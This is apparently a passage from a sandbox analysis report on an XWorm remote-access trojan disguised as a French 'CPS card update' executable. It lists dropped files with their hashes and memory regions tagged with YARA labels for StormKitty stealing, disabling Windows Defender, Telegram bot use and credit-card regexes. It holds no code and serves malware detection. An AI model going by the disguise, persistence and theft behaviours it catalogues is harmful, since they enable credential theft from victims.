SHA512: 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 2KB
MD5: d85ba6ff808d9e5444a4b369f5bc2730
SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 944B
MD5: 6e722800abdc44fc1ce4688ca490118f
SHA1: f64a4ff6d6e9b567151260fbaa543c345565de3b
SHA256: e63cad15f591e7898953167aa4ff8960500a177ad1bfa5e30229793b8b0af7e4
SHA512: 5b4f0da0561a1cc5f36bad93b1f0d9ce225e86464a4d1a5dbefe5eac8e339420446c9300b1362992b06838a302a8172944557e2c202bf980f5a22b98b9bea13b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: 7825839543f6b3c710e1ab92dbe7f1ec
SHA1: d43188bca6dd2038abf40282e497ee1d4c626f18
SHA256: 9fd6127316a4700789c6c0d93b62c3523e1245ae2d0180c91b0a4f39a80ccfd7
SHA512: aded824aec597a82736866bbbd44750f5b698b3408dfdb48979bd3d2638a1b4efd66ad00384bfc323275ff8f971cb85c80e00206201671f455c2870d9c27cb22
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: d8836c0315d56105d43f002e992524f7
SHA1: d1297b4a079838bac77840d677414c09710cca17
SHA256: 41385f2cb42b41f060b51e83de3c70ec8a7fd07700e44b7450c6a603578030e0
SHA512: 342ed7a766c2e38d331f7026ab62dd6711e2b1644bf60a4742a38a37db4c14d150d9f408c94ab93bd7254b23ea022dc05635e0e06ea3840514c3bac833f4b501
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: dd0e89eb06376648b6721ad5c3cd8f48
SHA1: 04ecbc9e78c27a0ff25eeea95f45bae1ae3cc70b
SHA256: 49aefa0ad54df58c06757e99015e9be5db27ade38108da2e864f6485ef8e4fd2
SHA512: 4132dd1e80d81c40648cf0475858075d79234a86352579933bdc697ab2f2f2f6107a1a0397caef27563592307e564c8e62c09c3f14fca323b157748713011291
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: 83684a616885de4c1e9413ebd4a00bf4
SHA1: 3f97fd7910fa0de20c18c9d17f454595fade8eb0
SHA256: 5abc3dff344d8f19fbad3274354ace5ce41dca82abb1a85b6937883ce052b617
SHA512: da6107926221ac64fcb6392a9f0f6b9d09c18a89aadd5738d7613c59c25d9faad253fb7edb6e8eda4e2f5f08e07152ddbd067e6d7fae8fffb67f18b2dfa0dfae
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: 48750759a6c508e64c9fa9a56f25fb68
SHA1: 2d885553d73940cc07d11c13c2fbc7d35a8ade91
SHA256: 06dbc75345d44373cf0657a2e2bea0dd957e921cc32e8350ca36b1efb0ef0368
SHA512: 39161378f31d95a016db63c332e69478aa51ad9cefa02472b5418f4680803f619ced4c638045fb54ffd0e3a5c95876e045c5a2fb50097b168f8be3f83dcba06b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: a789e2ae2e0515279062eeaeba00deb0
SHA1: a2ce26255d067b3a01e7ac4b971173ac2369ed15
SHA256: 4acafdb79f135612dc23c8f158b094804bfe7f9c968c20dec74a36b217819d61
SHA512: be81d07c81fc89ec7bb8834dc9334e1fbe10acced0be0e49a8ec4af4bc476be2001782446ae466a46e86d670b1336b3f9b956a84cb45c255668b9462caaaf113
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 944B
MD5: d28a889fd956d5cb3accfbaf1143eb6f
SHA1: 157ba54b365341f8ff06707d996b3635da8446f7
SHA256: 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512: 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 944B
MD5: adabeb4ab5727937b41a82146fefd87f
SHA1: 61429310f8374b1b752d74572b8512d695979493
SHA256: 14d3b1cadf88259544cec7202902a061821b12fae3ebfaa76a03e646710eb485
SHA512: 057ac7df07610fa4d111642dc6dc08c391be7b38f5a35bac7bb6c8345983df4d0b5f4a09ff534f9cddc24577f920e3a14b2fece8e71489c5c52254eaf25cf9c8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 944B
MD5: a0847a1f912ef989f2b3497b28c41b46
SHA1: 265ddd27c8fc985ab891472b5ef208d636ccfd8b
SHA256: 774edb0a31714fd00aed4c384fe9cf97f6d97b02bf70505355ada4e49b9db4fd
SHA512: 414f11e4addd81f1ff9e4d64d464b5f027e7ef45ee470178569bf27b54e69e2f00c0e38d8843d3e312432d7f03546271812433c5e617f5b6820ff306303e1af5
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phkrjhpb.yzv.ps1
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\tmp1AD1.tmp.bat
Filesize: 150B
MD5: fa8827eed9b3556b8990d00b41feb7bb
SHA1: 70210b96cbee4e10397b76651dd930a7a31340b7
SHA256: 25dce0cc5288582592573f454962e8b79894c325396d4c15430056a93be2dc8b
SHA512: d814d246afefb5547c6c1df49c7361eecc8e24ec772e00bee1a6ae666332b0917ed03b0700f8362850d2c91f59d4e8411b3c472b9f735db45b67d4fa364c44c2
-
C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe
Filesize: 75KB
MD5: a7d63348cfe9b0dc9d3aaec28c76c8f0
SHA1: 1b993f554960286e90cfd7cedf4c457e1c46ff80
SHA256: 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
SHA512: 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010
-
C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe (identical hashes to the submitted sample: the XWorm install copy)
Filesize: 167KB
MD5: d0685487fa7e474e68a40a1b1ff49b60
SHA1: 069285708e07814d852bbd5f39a7ffbb3c9e2d94
SHA256: 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6
SHA512: eda00ba1453a33024fc05316196ccd71981ba61ababb965d1c3f01251f377047b00d8b6a9b140acf335cfa9d478bb3b6dbc4aca37fe74cfecb929e965ed190a8
-
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
Filesize: 8B
MD5: cf759e4c5f14fe3eec41b87ed756cea8
SHA1: c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256: c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512: c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b
-
memory/1192-14-0x000002817A180000-0x000002817A190000-memory.dmp  Filesize: 64KB
memory/1192-11-0x000002817BC20000-0x000002817BC42000-memory.dmp  Filesize: 136KB
memory/1192-22-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/1192-16-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/1192-19-0x000002817A180000-0x000002817A190000-memory.dmp  Filesize: 64KB
memory/1192-18-0x000002817A180000-0x000002817A190000-memory.dmp  Filesize: 64KB
memory/1192-12-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/1192-13-0x000002817A180000-0x000002817A190000-memory.dmp  Filesize: 64KB
memory/1192-17-0x000002817A180000-0x000002817A190000-memory.dmp  Filesize: 64KB
memory/1268-155-0x00000169FDAF0000-0x00000169FDB00000-memory.dmp  Filesize: 64KB
memory/1268-176-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/1268-154-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/1268-156-0x00000169FDAF0000-0x00000169FDB00000-memory.dmp  Filesize: 64KB
memory/1412-100-0x0000000002AB0000-0x0000000002AC0000-memory.dmp  Filesize: 64KB
memory/1412-172-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/1412-171-0x00007FF93F0B0000-0x00007FF93F2A5000-memory.dmp  Filesize: 2.0MB
memory/1412-173-0x00007FF93F0B0000-0x00007FF93F2A5000-memory.dmp  Filesize: 2.0MB
memory/1412-97-0x0000000000920000-0x0000000000938000-memory.dmp  Filesize: 96KB  (yara: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice)
memory/1412-98-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/1784-230-0x000001AC63D80000-0x000001AC63D90000-memory.dmp  Filesize: 64KB
memory/1784-229-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/2200-153-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/2200-118-0x000001BF7EF40000-0x000001BF7EF50000-memory.dmp  Filesize: 64KB
memory/2200-111-0x000001BF7EF40000-0x000001BF7EF50000-memory.dmp  Filesize: 64KB
memory/2200-101-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/2256-210-0x000001BC7FBC0000-0x000001BC7FBD0000-memory.dmp  Filesize: 64KB
memory/2256-207-0x000001BC7FBC0000-0x000001BC7FBD0000-memory.dmp  Filesize: 64KB
memory/2256-203-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/2256-225-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/2256-209-0x000001BC7FBC0000-0x000001BC7FBD0000-memory.dmp  Filesize: 64KB
memory/2436-196-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/2964-212-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/2964-213-0x000002A374C20000-0x000002A374C30000-memory.dmp  Filesize: 64KB
memory/2964-214-0x000002A374C20000-0x000002A374C30000-memory.dmp  Filesize: 64KB
memory/2964-228-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/3132-81-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/3132-79-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/3944-40-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/3944-37-0x000001E777590000-0x000001E7775A0000-memory.dmp  Filesize: 64KB
memory/3944-24-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/3944-38-0x000001E777590000-0x000001E7775A0000-memory.dmp  Filesize: 64KB
memory/3944-31-0x000001E777590000-0x000001E7775A0000-memory.dmp  Filesize: 64KB
memory/3944-30-0x000001E777590000-0x000001E7775A0000-memory.dmp  Filesize: 64KB
memory/4160-55-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/4160-51-0x0000013EA7700000-0x0000013EA7710000-memory.dmp  Filesize: 64KB
memory/4160-53-0x0000013EA7700000-0x0000013EA7710000-memory.dmp  Filesize: 64KB
memory/4160-50-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/4196-15-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/4196-93-0x000000001B880000-0x000000001B88E000-memory.dmp  Filesize: 56KB  (yara: INDICATOR_SUSPICIOUS_Binary_References_Browsers)
memory/4196-0-0x0000000000050000-0x0000000000080000-memory.dmp  Filesize: 192KB  (yara: family_xworm, INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA, INDICATOR_SUSPICIOUS_EXE_TelegramChatBot)
memory/4196-83-0x000000001C4C0000-0x000000001C4CE000-memory.dmp  Filesize: 56KB  (yara: disable_win_def, INDICATOR_SUSPICIOUS_DisableWinDefender, INDICATOR_SUSPICIOUS_EXE_RegKeyComb_DisableWinDefender)
memory/4196-1-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/4196-92-0x000000001E1E0000-0x000000001E300000-memory.dmp  Filesize: 1.1MB  (yara: family_stormkitty, INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, INDICATOR_SUSPICIOUS_EXE_CC_Regex)
memory/4964-190-0x000001E27E360000-0x000001E27E370000-memory.dmp  Filesize: 64KB
memory/4964-192-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/4964-189-0x000001E27E360000-0x000001E27E370000-memory.dmp  Filesize: 64KB
memory/4964-187-0x000001E27E360000-0x000001E27E370000-memory.dmp  Filesize: 64KB
memory/4964-177-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/5108-65-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB
memory/5108-66-0x000001661AF80000-0x000001661AF90000-memory.dmp  Filesize: 64KB
memory/5108-68-0x000001661AF80000-0x000001661AF90000-memory.dmp  Filesize: 64KB
memory/5108-69-0x000001661AF80000-0x000001661AF90000-memory.dmp  Filesize: 64KB
memory/5108-70-0x000001661AF80000-0x000001661AF90000-memory.dmp  Filesize: 64KB
memory/5108-72-0x00007FF9207A0000-0x00007FF921261000-memory.dmp  Filesize: 10.8MB